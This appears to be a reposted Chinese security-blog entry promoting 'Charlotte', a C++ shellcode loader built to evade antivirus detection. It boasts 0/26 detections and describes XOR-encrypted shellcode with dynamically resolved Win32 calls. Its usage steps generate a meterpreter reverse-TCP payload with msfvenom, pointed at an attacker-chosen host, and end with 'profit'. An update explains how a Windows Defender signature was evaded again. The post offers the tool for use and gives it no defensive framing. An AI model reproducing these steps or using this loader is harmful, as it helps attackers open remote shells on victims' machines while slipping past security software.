免杀 0/26 Charlotte C++ Shellcode 加载器

  • A+
所属分类:安全文章


免杀 0/26 Charlotte C++ Shellcode 加载器


免杀 0/26 Charlotte C++ Shellcode 加载器


2021年5月13日:


  1. c ++ shellcode启动器,截至2021年5月13日完全未检测到0/26。

  2. 动态调用win32 api函数

  3. Shellcode和函数名称的XOR加密

  4. 每次运行随机XOR键和变量

  5. 在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!


2021年5月17日:


    1.随机字符串长度和XOR键长度


免杀 0/26 Charlotte C++ Shellcode 加载器


用法


        git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py

例子:


  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

  2. cd charlotte

  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

  4. python charlotte.py

  5. profit


更新v1.1

2021/05/21:

显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。


项目地址:

https://github.com/9emin1/charlotte

本文始发于微信公众号(Khan安全攻防实验室):免杀 0/26 Charlotte C++ Shellcode 加载器

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: